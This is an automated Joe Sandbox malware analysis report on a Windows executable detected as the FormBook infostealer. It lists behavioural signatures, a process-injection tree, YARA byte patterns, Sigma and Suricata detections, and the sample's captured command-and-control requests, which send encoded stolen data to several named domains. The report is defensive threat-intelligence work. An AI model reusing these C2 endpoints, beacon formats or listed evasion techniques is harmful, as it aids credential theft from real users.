Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Certificate 1045-20-11.exe

Overview

General Information

Sample name:Certificate 1045-20-11.exe
Analysis ID:1560129
MD5:374bfa99caf54477156253c18125cdc8
SHA1:b252c1316f4d9b91e79f64c51365cf65981f64d1
SHA256:f605d6db615c055fc80141bf79ab3f541303cf082244b352352bbd982a7aca50
Tags:exeuser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Certificate 1045-20-11.exe (PID: 6548 cmdline: "C:\Users\user\Desktop\Certificate 1045-20-11.exe" MD5: 374BFA99CAF54477156253C18125CDC8)
    • svchost.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\Certificate 1045-20-11.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FGcoivYXQsEMNANuoDkk.exe (PID: 2124 cmdline: "C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6880 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • FGcoivYXQsEMNANuoDkk.exe (PID: 3752 cmdline: "C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4624 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.2520000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.2520000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.2520000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.2520000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", CommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", ParentImage: C:\Users\user\Desktop\Certificate 1045-20-11.exe, ParentProcessId: 6548, ParentProcessName: Certificate 1045-20-11.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", ProcessId: 6640, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", CommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", ParentImage: C:\Users\user\Desktop\Certificate 1045-20-11.exe, ParentProcessId: 6548, ParentProcessName: Certificate 1045-20-11.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 1045-20-11.exe", ProcessId: 6640, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T12:53:31.929353+010020507451Malware Command and Control Activity Detected192.168.2.449736154.215.72.11080TCP
            2024-11-21T12:54:05.481825+010020507451Malware Command and Control Activity Detected192.168.2.449762116.50.37.24480TCP
            2024-11-21T12:55:28.530745+010020507451Malware Command and Control Activity Detected192.168.2.44981685.159.66.9380TCP
            2024-11-21T12:55:43.312625+010020507451Malware Command and Control Activity Detected192.168.2.44998391.195.240.9480TCP
            2024-11-21T12:56:06.621580+010020507451Malware Command and Control Activity Detected192.168.2.45001866.29.149.4680TCP
            2024-11-21T12:56:21.509284+010020507451Malware Command and Control Activity Detected192.168.2.450022195.110.124.13380TCP
            2024-11-21T12:56:52.795541+010020507451Malware Command and Control Activity Detected192.168.2.450026217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.rssnewscast.com/fo8o/?SHqP-p=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&0xilO=7vZpwBGAvira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?0xilO=7vZpwBG&SHqP-p=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?0xilO=7vZpwBG&SHqP-p=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Certificate 1045-20-11.exeReversingLabs: Detection: 28%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Certificate 1045-20-11.exeJoe Sandbox ML: detected
            Source: Certificate 1045-20-11.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165025398.000000000017E000.00000002.00000001.01000000.00000004.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4165156204.000000000017E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 1045-20-11.exe, 00000000.00000003.1715042860.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Certificate 1045-20-11.exe, 00000000.00000003.1719350842.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1778975404.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1780442944.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1871465604.000000000312E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.000000000347E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1868746207.0000000002F34000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 1045-20-11.exe, 00000000.00000003.1715042860.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Certificate 1045-20-11.exe, 00000000.00000003.1719350842.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1871034857.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1778975404.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1780442944.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1871465604.000000000312E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.000000000347E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1868746207.0000000002F34000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1869223621.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837507725.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165898672.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4168533677.000000000390C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2165142022.00000000051EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4168533677.000000000390C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2165142022.00000000051EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1869223621.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837507725.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165898672.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00886CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00886CA9
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_008860DD
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_008863F9
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0088EB60
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0088F5FA
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088F56F FindFirstFileW,FindClose,0_2_0088F56F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00891B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00891B2F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00891C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00891C8A
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00891F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00891F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0076BAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_0076BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax3_2_00759480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi3_2_0075DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h3_2_02FD053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49762 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49816 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49983 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 66.29.149.46:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00894EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00894EB5
            Source: global trafficHTTP traffic detected: GET /fo8o/?0xilO=7vZpwBG&SHqP-p=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?0xilO=7vZpwBG&SHqP-p=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?0xilO=7vZpwBG&SHqP-p=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?SHqP-p=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&0xilO=7vZpwBG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?SHqP-p=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&0xilO=7vZpwBG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?0xilO=7vZpwBG&SHqP-p=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?SHqP-p=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&0xilO=7vZpwBG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: global trafficDNS traffic detected: DNS query: www.shenzhoucui.com
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 53 48 71 50 2d 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d Data 